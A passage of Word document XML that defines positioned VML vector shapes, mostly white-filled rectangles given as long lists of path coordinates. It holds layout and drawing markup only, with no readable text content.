4112,6417,4115,6417,4118,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6417,4121,6418,4121,6418,4121,6418,4121,6418,4121,6418,4121,6418,4121,6418,4121,6418,4121,6419,4121,6419,4121,6419,4121,6419,4121,6420,4121,6420,4121,6420,4121,6421,4121,6421,4121,6421,4121,6422,4121,6422,4121,6423,4121,6423,4121,6424,4121,6424,4121,6425,4121,6426,4121,6426,4121,6427,4121,6428,4121,6428,4121,6429,4121,6430,4121,6431,4121,6432,4121,6433,4121,6434,4121,6435,4121,6436,4121,6437,4121,6439,4121,6440,4121,6441,4121,6442,4121,6444,4121,6445,4121,6447,4121,6448,4121,6450,4121,6452,4121,6453,4121,6455,4121,6457,4121,6459,4121,6461,4121,6463,4121,6465,4121,6467,4121,6469,4121,6471,4121,6474,4121,6476,4121,6479,4121,6481,4121,6484,4121,6486,4121,6489,4121,6492,4121,6495,4121,6498,4121,6501,4121,6504,4121,6507,4121,6510,4121,6514,4121,6517,4121,6520,4121,6524,4121,6528,4121,6531,4121,6535,4121,6539,4121,6543,4121,6547,4121,6551,4121,6555,4121,6560,4121,6564,4121,6569,4121,6573,4121,6578,4121,6583,4121,6588,4121,6592,4121,6598,4121,6603,4121,6608,4121,6613,4121,6619,4121,6624,4121,6630,4121,6636,4121,6642,4121,6647,4121,6654,4121,6660,4121,6666,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4121,6672,4120,6672,4120,6672,4120,6672,4120,6672,4120,6672,4120,6672,4120,6672,4120,6672,4119,6672,4119,6672,4119,6672,4119,6672,4119,6672,4118,6672,4118,6672,4118,6672,4117,6672,4117,6672,4117,6672,4117,6672,4116,6672,4116,6672,4115,6672,4115,6672,4115,6672,4114,6672,4114,6672,4113,6672,4113,6672,4112,6672,4112,6672,4111,6672,4110,6672,4110,6672,4109,6672,4109,6672,4108,6672,4107,6672,4106,6672,4106,6672,4105,6672,4104,6672,4103,6672,4102,6672,4102,6672,4101,6672,4100,6672,4099,6672,4098,6672,4097,6672,4096,6672,4094,6672,4093,6672,4092,6672,4091,6672,4090,6672,4089,6672,4087,6672,4086,6672,4085,6672,4083,6672,4082,6672,4080,6672,4079,6672,4077,6672,4076,6672,4074,6672,4073,6672,4071,6672,4069,6672,4067,6672,4066,6672,4064,6672,4062,6672,4060,6672,4058,6672,4056,6672,4054,6672,4052,6672,4050,6672,4048,6672,4045,6672,4043,6672,4041,6672,4039,6672,4036,6672,4034,6672,4031,6672,4029,6672,4026,6672,4024,6672,4021,6672,4018,6672,4016,6672,4013,6672,4010,6672,4007,6672,4004,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6672,4001,6671,4001,6671,4001,6671,4001,6671,4001,6671,4001,6671,4001,6670,4001,6670,4001,6670,4001,6669,4001,6669,4001,6669,4001,6668,4001,6668,4001,6667,4001,6667,4001,6666,4001,6666,4001,6665,4001,6665,4001,6664,4001,6663,4001,6663,4001,6662,4001,6661,4001,6660,4001,6659,4001,6659,4001,6658,4001,6657,4001,6656,4001,6655,4001,6653,4001,6652,4001,6651,4001,6650,4001,6649,4001,6647,4001,6646,4001,6644,4001,6643,4001,6641,4001,6640,4001,6638,4001,6636,4001,6635,4001,6633,4001,6631,4001,6629,4001,6627,4001,6625,4001,6623,4001,6620,4001,6618,4001,6616,4001,6613,4001,6611,4001,6608,4001,6606,4001,6603,4001,6601,4001,6598,4001,6595,4001,6592,4001,6589,4001,6586,4001,6583,4001,6579,4001,6576,4001,6573,4001,6569,4001,6566,4001,6562,4001,6558,4001,6554,4001,6551,4001,6547,4001,6543,4001,6538,4001,6534,4001,6530,4001,6525,4001,6521,4001,6516,4001,6512,4001,6507,4001,6502,4001,6497,4001,6492,4001,6487,4001,6482,4001,6476,4001,6471,4001,6465,4001,6460,4001,6454,4001,6448,4001,6442,4001,6436,4001,6430,4001,6424,4001,6417e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:2650;top:7050;width:130;height:250" coordorigin="2650,7050" coordsize="130,250" path="m2665,7063l2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2665,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2666,7063,2667,7063,2667,7063,2667,7063,2667,7063,2667,7063,2667,7063,2668,7063,2668,7063,2668,7063,2668,7063,2669,7063,2669,7063,2669,7063,2670,7063,2670,7063,2670,7063,2671,7063,2671,7063,2671,7063,2672,7063,2672,7063,2673,7063,2673,7063,2674,7063,2674,7063,2675,7063,2675,7063,2676,7063,2677,7063,2677,7063,2678,7063,2679,7063,2679,7063,2680,7063,2681,7063,2682,7063,2682,7063,2683,7063,2684,7063,2685,7063,2686,7063,2687,7063,2688,7063,2689,7063,2690,7063,2691,7063,2692,7063,2693,7063,2694,7063,2695,7063,2697,7063,2698,7063,2699,7063,2700,7063,2702,7063,2703,7063,2705,7063,2706,7063,2708,7063,2709,7063,2711,7063,2712,7063,2714,7063,2716,7063,2717,7063,2719,7063,2721,7063,2723,7063,2725,7063,2726,7063,2728,7063,2730,7063,2732,7063,2734,7063,2737,7063,2739,7063,2741,7063,2743,7063,2745,7063,2748,7063,2750,7063,2753,7063,2755,7063,2758,7063,2760,7063,2763,7063,2765,7063,2768,7063,2771,7063,2774,7063,2777,7063,2779,7063,2782,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7063,2785,7064,2785,7064,2785,7064,2785,7064,2785,7064,2785,7065,2785,7065,2785,7065,2785,7066,2785,7066,2785,7066,2785,7067,2785,7067,2785,7068,2785,7068,2785,7069,2785,7069,2785,7070,2785,7070,2785,7071,2785,7072,2785,7072,2785,7073,2785,7074,2785,7075,2785,7075,2785,7076,2785,7077,2785,7078,2785,7079,2785,7080,2785,7081,2785,7083,2785,7084,2785,7085,2785,7086,2785,7088,2785,7089,2785,7091,2785,7092,2785,7094,2785,7095,2785,7097,2785,7099,2785,7100,2785,7102,2785,7104,2785,7106,2785,7108,2785,7110,2785,7112,2785,7114,2785,7117,2785,7119,2785,7121,2785,7124,2785,7126,2785,7129,2785,7132,2785,7134,2785,7137,2785,7140,2785,7143,2785,7146,2785,7149,2785,7152,2785,7156,2785,7159,2785,7162,2785,7166,2785,7169,2785,7173,2785,7177,2785,7180,2785,7184,2785,7188,2785,7192,2785,7197,2785,7201,2785,7205,2785,7209,2785,7214,2785,7219,2785,7223,2785,7228,2785,7233,2785,7238,2785,7243,2785,7248,2785,7253,2785,7259,2785,7264,2785,7270,2785,7275,2785,7281,2785,7287,2785,7293,2785,7299,2785,7305,2785,7311,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2785,7318,2784,7318,2784,7318,2784,7318,2784,7318,2784,7318,2784,7318,2783,7318,2783,7318,2783,7318,2783,7318,2783,7318,2782,7318,2782,7318,2782,7318,2781,7318,2781,7318,2781,7318,2780,7318,2780,7318,2780,7318,2779,7318,2779,7318,2778,7318,2778,7318,2778,7318,2777,7318,2776,7318,2776,7318,2775,7318,2775,7318,2774,7318,2774,7318,2773,7318,2772,7318,2772,7318,2771,7318,2770,7318,2769,7318,2768,7318,2768,7318,2767,7318,2766,7318,2765,7318,2764,7318,2763,7318,2762,7318,2761,7318,2760,7318,2759,7318,2758,7318,2757,7318,2755,7318,2754,7318,2753,7318,2752,7318,2750,7318,2749,7318,2748,7318,2746,7318,2745,7318,2743,7318,2742,7318,2740,7318,2738,7318,2737,7318,2735,7318,2733,7318,2732,7318,2730,7318,2728,7318,2726,7318,2724,7318,2722,7318,2720,7318,2718,7318,2716,7318,2714,7318,2712,7318,2710,7318,2708,7318,2705,7318,2703,7318,2701,7318,2698,7318,2696,7318,2693,7318,2691,7318,2688,7318,2685,7318,2683,7318,2680,7318,2677,7318,2674,7318,2671,7318,2668,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7318,2665,7317,2665,7317,2665,7317,2665,7317,2665,7317,2665,7317,2665,7317,2665,7317,2665,7317,2665,7316,2665,7316,2665,7316,2665,7316,2665,7316,2665,7315,2665,7315,2665,7315,2665,7314,2665,7314,2665,7314,2665,7313,2665,7313,2665,7312,2665,7312,2665,7311,2665,7311,2665,7310,2665,7309,2665,7309,2665,7308,2665,7307,2665,7306,2665,7306,2665,7305,2665,7304,2665,7303,2665,7302,2665,7301,2665,7300,2665,7299,2665,7298,2665,7296,2665,7295,2665,7294,2665,7292,2665,7291,2665,7290,2665,7288,2665,7287,2665,7285,2665,7283,2665,7282,2665,7280,2665,7278,2665,7276,2665,7274,2665,7272,2665,7270,2665,7268,2665,7266,2665,7264,2665,7261,2665,7259,2665,7256,2665,7254,2665,7251,2665,7249,2665,7246,2665,7243,2665,7240,2665,7237,2665,7234,2665,7231,2665,7228,2665,7225,2665,7221,2665,7218,2665,7215,2665,7211,2665,7207,2665,7204,2665,7200,2665,7196,2665,7192,2665,7188,2665,7184,2665,7180,2665,7175,2665,7171,2665,7166,2665,7162,2665,7157,2665,7152,2665,7147,2665,7142,2665,7137,2665,7132,2665,7127,2665,7122,2665,7116,2665,7111,2665,7105,2665,7099,2665,7093,2665,7087,2665,7081,2665,7075,2665,7069,2665,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:3010;top:7050;width:130;height:250" coordorigin="3010,7050" coordsize="130,250" path="m3026,7063l3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3026,7063,3027,7063,3027,7063,3027,7063,3027,7063,3027,7063,3027,7063,3027,7063,3028,7063,3028,7063,3028,7063,3028,7063,3029,7063,3029,7063,3029,7063,3029,7063,3030,7063,3030,7063,3030,7063,3031,7063,3031,7063,3032,7063,3032,7063,3032,7063,3033,7063,3033,7063,3034,7063,3034,7063,3035,7063,3036,7063,3036,7063,3037,7063,3037,7063,3038,7063,3039,7063,3039,7063,3040,7063,3041,7063,3042,7063,3043,7063,3043,7063,3044,7063,3045,7063,3046,7063,3047,7063,3048,7063,3049,7063,3050,7063,3051,7063,3052,7063,3053,7063,3054,7063,3056,7063,3057,7063,3058,7063,3059,7063,3061,7063,3062,7063,3063,7063,3065,7063,3066,7063,3068,7063,3069,7063,3071,7063,3072,7063,3074,7063,3076,7063,3077,7063,3079,7063,3081,7063,3083,7063,3085,7063,3087,7063,3089,7063,3091,7063,3093,7063,3095,7063,3097,7063,3099,7063,3101,7063,3103,7063,3106,7063,3108,7063,3110,7063,3113,7063,3115,7063,3118,7063,3120,7063,3123,7063,3126,7063,3128,7063,3131,7063,3134,7063,3137,7063,3140,7063,3143,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7063,3146,7064,3146,7064,3146,7064,3146,7064,3146,7064,3146,7065,3146,7065,3146,7065,3146,7066,3146,7066,3146,7066,3146,7067,3146,7067,3146,7068,3146,7068,3146,7069,3146,7069,3146,7070,3146,7070,3146,7071,3146,7072,3146,7072,3146,7073,3146,7074,3146,7075,3146,7075,3146,7076,3146,7077,3146,7078,3146,7079,3146,7080,3146,7081,3146,7083,3146,7084,3146,7085,3146,7086,3146,7088,3146,7089,3146,7091,3146,7092,3146,7094,3146,7095,3146,7097,3146,7099,3146,7100,3146,7102,3146,7104,3146,7106,3146,7108,3146,7110,3146,7112,3146,7114,3146,7117,3146,7119,3146,7121,3146,7124,3146,7126,3146,7129,3146,7132,3146,7134,3146,7137,3146,7140,3146,7143,3146,7146,3146,7149,3146,7152,3146,7156,3146,7159,3146,7162,3146,7166,3146,7169,3146,7173,3146,7177,3146,7180,3146,7184,3146,7188,3146,7192,3146,7197,3146,7201,3146,7205,3146,7209,3146,7214,3146,7219,3146,7223,3146,7228,3146,7233,3146,7238,3146,7243,3146,7248,3146,7253,3146,7259,3146,7264,3146,7270,3146,7275,3146,7281,3146,7287,3146,7293,3146,7299,3146,7305,3146,7311,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3146,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3145,7318,3144,7318,3144,7318,3144,7318,3144,7318,3144,7318,3144,7318,3143,7318,3143,7318,3143,7318,3143,7318,3143,7318,3142,7318,3142,7318,3142,7318,3141,7318,3141,7318,3141,7318,3140,7318,3140,7318,3140,7318,3139,7318,3139,7318,3138,7318,3138,7318,3137,7318,3137,7318,3136,7318,3136,7318,3135,7318,3134,7318,3134,7318,3133,7318,3132,7318,3132,7318,3131,7318,3130,7318,3129,7318,3129,7318,3128,7318,3127,7318,3126,7318,3125,7318,3124,7318,3123,7318,3122,7318,3121,7318,3120,7318,3119,7318,3118,7318,3117,7318,3116,7318,3114,7318,3113,7318,3112,7318,3110,7318,3109,7318,3108,7318,3106,7318,3105,7318,3103,7318,3102,7318,3100,7318,3099,7318,3097,7318,3095,7318,3094,7318,3092,7318,3090,7318,3088,7318,3086,7318,3084,7318,3083,7318,3081,7318,3079,7318,3076,7318,3074,7318,3072,7318,3070,7318,3068,7318,3065,7318,3063,7318,3061,7318,3058,7318,3056,7318,3053,7318,3051,7318,3048,7318,3045,7318,3043,7318,3040,7318,3037,7318,3034,7318,3031,7318,3029,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7318,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7317,3026,7316,3026,7316,3026,7316,3026,7316,3026,7316,3026,7315,3026,7315,3026,7315,3026,7314,3026,7314,3026,7314,3026,7313,3026,7313,3026,7312,3026,7312,3026,7311,3026,7311,3026,7310,3026,7309,3026,7309,3026,7308,3026,7307,3026,7306,3026,7306,3026,7305,3026,7304,3026,7303,3026,7302,3026,7301,3026,7300,3026,7299,3026,7298,3026,7296,3026,7295,3026,7294,3026,7292,3026,7291,3026,7290,3026,7288,3026,7287,3026,7285,3026,7283,3026,7282,3026,7280,3026,7278,3026,7276,3026,7274,3026,7272,3026,7270,3026,7268,3026,7266,3026,7264,3026,7261,3026,7259,3026,7256,3026,7254,3026,7251,3026,7249,3026,7246,3026,7243,3026,7240,3026,7237,3026,7234,3026,7231,3026,7228,3026,7225,3026,7221,3026,7218,3026,7215,3026,7211,3026,7207,3026,7204,3026,7200,3026,7196,3026,7192,3026,7188,3026,7184,3026,7180,3026,7175,3026,7171,3026,7166,3026,7162,3026,7157,3026,7152,3026,7147,3026,7142,3026,7137,3026,7132,3026,7127,3026,7122,3026,7116,3026,7111,3026,7105,3026,7099,3026,7093,3026,7087,3026,7081,3026,7075,3026,7069,3026,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:420.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8410,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:8410;top:7050;width:130;height:250" coordorigin="8410,7050" coordsize="130,250" path="m8428,7063l8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8428,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8429,7063,8430,7063,8430,7063,8430,7063,8430,7063,8430,7063,8431,7063,8431,7063,8431,7063,8431,7063,8432,7063,8432,7063,8432,7063,8432,7063,8433,7063,8433,7063,8434,7063,8434,7063,8434,7063,8435,7063,8435,7063,8436,7063,8436,7063,8437,7063,8437,7063,8438,7063,8438,7063,8439,7063,8439,7063,8440,7063,8441,7063,8441,7063,8442,7063,8443,7063,8444,7063,8444,7063,8445,7063,8446,7063,8447,7063,8448,7063,8449,7063,8450,7063,8451,7063,8452,7063,8453,7063,8454,7063,8455,7063,8456,7063,8457,7063,8458,7063,8460,7063,8461,7063,8462,7063,8463,7063,8465,7063,8466,7063,8468,7063,8469,7063,8470,7063,8472,7063,8474,7063,8475,7063,8477,7063,8478,7063,8480,7063,8482,7063,8484,7063,8486,7063,8487,7063,8489,7063,8491,7063,8493,7063,8495,7063,8497,7063,8499,7063,8502,7063,8504,7063,8506,7063,8508,7063,8511,7063,8513,7063,8516,7063,8518,7063,8521,7063,8523,7063,8526,7063,8528,7063,8531,7063,8534,7063,8537,7063,8539,7063,8542,7063,8545,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7064,8548,7064,8548,7064,8548,7064,8548,7064,8548,7065,8548,7065,8548,7065,8548,7066,8548,7066,8548,7066,8548,7067,8548,7067,8548,7068,8548,7068,8548,7069,8548,7069,8548,7070,8548,7070,8548,7071,8548,7072,8548,7072,8548,7073,8548,7074,8548,7075,8548,7075,8548,7076,8548,7077,8548,7078,8548,7079,8548,7080,8548,7081,8548,7083,8548,7084,8548,7085,8548,7086,8548,7088,8548,7089,8548,7091,8548,7092,8548,7094,8548,7095,8548,7097,8548,7099,8548,7100,8548,7102,8548,7104,8548,7106,8548,7108,8548,7110,8548,7112,8548,7114,8548,7117,8548,7119,8548,7121,8548,7124,8548,7126,8548,7129,8548,7132,8548,7134,8548,7137,8548,7140,8548,7143,8548,7146,8548,7149,8548,7152,8548,7156,8548,7159,8548,7162,8548,7166,8548,7169,8548,7173,8548,7177,8548,7180,8548,7184,8548,7188,8548,7192,8548,7197,8548,7201,8548,7205,8548,7209,8548,7214,8548,7219,8548,7223,8548,7228,8548,7233,8548,7238,8548,7243,8548,7248,8548,7253,8548,7259,8548,7264,8548,7270,8548,7275,8548,7281,8548,7287,8548,7293,8548,7299,8548,7305,8548,7311,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8547,7318,8547,7318,8547,7318,8547,7318,8547,7318,8547,7318,8547,7318,8546,7318,8546,7318,8546,7318,8546,7318,8546,7318,8545,7318,8545,7318,8545,7318,8544,7318,8544,7318,8544,7318,8543,7318,8543,7318,8543,7318,8542,7318,8542,7318,8541,7318,8541,7318,8540,7318,8540,7318,8539,7318,8539,7318,8538,7318,8538,7318,8537,7318,8536,7318,8536,7318,8535,7318,8534,7318,8534,7318,8533,7318,8532,7318,8531,7318,8530,7318,8530,7318,8529,7318,8528,7318,8527,7318,8526,7318,8525,7318,8524,7318,8523,7318,8522,7318,8521,7318,8519,7318,8518,7318,8517,7318,8516,7318,8514,7318,8513,7318,8512,7318,8510,7318,8509,7318,8508,7318,8506,7318,8505,7318,8503,7318,8501,7318,8500,7318,8498,7318,8496,7318,8495,7318,8493,7318,8491,7318,8489,7318,8487,7318,8485,7318,8483,7318,8481,7318,8479,7318,8477,7318,8475,7318,8473,7318,8470,7318,8468,7318,8466,7318,8463,7318,8461,7318,8459,7318,8456,7318,8453,7318,8451,7318,8448,7318,8446,7318,8443,7318,8440,7318,8437,7318,8434,7318,8431,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7318,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7317,8428,7316,8428,7316,8428,7316,8428,7316,8428,7316,8428,7315,8428,7315,8428,7315,8428,7314,8428,7314,8428,7314,8428,7313,8428,7313,8428,7312,8428,7312,8428,7311,8428,7311,8428,7310,8428,7309,8428,7309,8428,7308,8428,7307,8428,7306,8428,7306,8428,7305,8428,7304,8428,7303,8428,7302,8428,7301,8428,7300,8428,7299,8428,7298,8428,7296,8428,7295,8428,7294,8428,7292,8428,7291,8428,7290,8428,7288,8428,7287,8428,7285,8428,7283,8428,7282,8428,7280,8428,7278,8428,7276,8428,7274,8428,7272,8428,7270,8428,7268,8428,7266,8428,7264,8428,7261,8428,7259,8428,7256,8428,7254,8428,7251,8428,7249,8428,7246,8428,7243,8428,7240,8428,7237,8428,7234,8428,7231,8428,7228,8428,7225,8428,7221,8428,7218,8428,7215,8428,7211,8428,7207,8428,7204,8428,7200,8428,7196,8428,7192,8428,7188,8428,7184,8428,7180,8428,7175,8428,7171,8428,7166,8428,7162,8428,7157,8428,7152,8428,7147,8428,7142,8428,7137,8428,7132,8428,7127,8428,7122,8428,7116,8428,7111,8428,7105,8428,7099,8428,7093,8428,7087,8428,7081,8428,7075,8428,7069,8428,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:426.500pt;margin-top:352.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8530,7050" coordsize="130,250">
        <v:shape style="position:absolute;left:8530;top:7050;width:130;height:250" coordorigin="8530,7050" coordsize="130,250" path="m8548,7063l8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8548,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8549,7063,8550,7063,8550,7063,8550,7063,8550,7063,8550,7063,8550,7063,8551,7063,8551,7063,8551,7063,8551,7063,8552,7063,8552,7063,8552,7063,8553,7063,8553,7063,8553,7063,8554,7063,8554,7063,8554,7063,8555,7063,8555,7063,8556,7063,8556,7063,8557,7063,8557,7063,8558,7063,8558,7063,8559,7063,8560,7063,8560,7063,8561,7063,8561,7063,8562,7063,8563,7063,8564,7063,8564,7063,8565,7063,8566,7063,8567,7063,8568,7063,8569,7063,8570,7063,8571,7063,8572,7063,8573,7063,8574,7063,8575,7063,8576,7063,8577,7063,8578,7063,8580,7063,8581,7063,8582,7063,8583,7063,8585,7063,8586,7063,8588,7063,8589,7063,8591,7063,8592,7063,8594,7063,8595,7063,8597,7063,8599,7063,8600,7063,8602,7063,8604,7063,8606,7063,8607,7063,8609,7063,8611,7063,8613,7063,8615,7063,8617,7063,8620,7063,8622,7063,8624,7063,8626,7063,8628,7063,8631,7063,8633,7063,8636,7063,8638,7063,8641,7063,8643,7063,8646,7063,8648,7063,8651,7063,8654,7063,8657,7063,8660,7063,8662,7063,8665,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7063,8668,7064,8668,7064,8668,7064,8668,7064,8668,7064,8668,7065,8668,7065,8668,7065,8668,7066,8668,7066,8668,7066,8668,7067,8668,7067,8668,7068,8668,7068,8668,7069,8668,7069,8668,7070,8668,7070,8668,7071,8668,7072,8668,7072,8668,7073,8668,7074,8668,7075,8668,7075,8668,7076,8668,7077,8668,7078,8668,7079,8668,7080,8668,7081,8668,7083,8668,7084,8668,7085,8668,7086,8668,7088,8668,7089,8668,7091,8668,7092,8668,7094,8668,7095,8668,7097,8668,7099,8668,7100,8668,7102,8668,7104,8668,7106,8668,7108,8668,7110,8668,7112,8668,7114,8668,7117,8668,7119,8668,7121,8668,7124,8668,7126,8668,7129,8668,7132,8668,7134,8668,7137,8668,7140,8668,7143,8668,7146,8668,7149,8668,7152,8668,7156,8668,7159,8668,7162,8668,7166,8668,7169,8668,7173,8668,7177,8668,7180,8668,7184,8668,7188,8668,7192,8668,7197,8668,7201,8668,7205,8668,7209,8668,7214,8668,7219,8668,7223,8668,7228,8668,7233,8668,7238,8668,7243,8668,7248,8668,7253,8668,7259,8668,7264,8668,7270,8668,7275,8668,7281,8668,7287,8668,7293,8668,7299,8668,7305,8668,7311,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8668,7318,8667,7318,8667,7318,8667,7318,8667,7318,8667,7318,8667,7318,8666,7318,8666,7318,8666,7318,8666,7318,8666,7318,8665,7318,8665,7318,8665,7318,8664,7318,8664,7318,8664,7318,8663,7318,8663,7318,8663,7318,8662,7318,8662,7318,8661,7318,8661,7318,8660,7318,8660,7318,8659,7318,8659,7318,8658,7318,8658,7318,8657,7318,8657,7318,8656,7318,8655,7318,8654,7318,8654,7318,8653,7318,8652,7318,8651,7318,8651,7318,8650,7318,8649,7318,8648,7318,8647,7318,8646,7318,8645,7318,8644,7318,8643,7318,8642,7318,8641,7318,8639,7318,8638,7318,8637,7318,8636,7318,8635,7318,8633,7318,8632,7318,8631,7318,8629,7318,8628,7318,8626,7318,8625,7318,8623,7318,8621,7318,8620,7318,8618,7318,8616,7318,8615,7318,8613,7318,8611,7318,8609,7318,8607,7318,8605,7318,8603,7318,8601,7318,8599,7318,8597,7318,8595,7318,8593,7318,8591,7318,8588,7318,8586,7318,8584,7318,8581,7318,8579,7318,8576,7318,8574,7318,8571,7318,8568,7318,8566,7318,8563,7318,8560,7318,8557,7318,8554,7318,8551,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7318,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7317,8548,7316,8548,7316,8548,7316,8548,7316,8548,7316,8548,7315,8548,7315,8548,7315,8548,7314,8548,7314,8548,7314,8548,7313,8548,7313,8548,7312,8548,7312,8548,7311,8548,7311,8548,7310,8548,7309,8548,7309,8548,7308,8548,7307,8548,7306,8548,7306,8548,7305,8548,7304,8548,7303,8548,7302,8548,7301,8548,7300,8548,7299,8548,7298,8548,7296,8548,7295,8548,7294,8548,7292,8548,7291,8548,7290,8548,7288,8548,7287,8548,7285,8548,7283,8548,7282,8548,7280,8548,7278,8548,7276,8548,7274,8548,7272,8548,7270,8548,7268,8548,7266,8548,7264,8548,7261,8548,7259,8548,7256,8548,7254,8548,7251,8548,7249,8548,7246,8548,7243,8548,7240,8548,7237,8548,7234,8548,7231,8548,7228,8548,7225,8548,7221,8548,7218,8548,7215,8548,7211,8548,7207,8548,7204,8548,7200,8548,7196,8548,7192,8548,7188,8548,7184,8548,7180,8548,7175,8548,7171,8548,7166,8548,7162,8548,7157,8548,7152,8548,7147,8548,7142,8548,7137,8548,7132,8548,7127,8548,7122,8548,7116,8548,7111,8548,7105,8548,7099,8548,7093,8548,7087,8548,7081,8548,7075,8548,7069,8548,7063e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:109.500pt;margin-top:365.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2190,7310" coordsize="130,270">
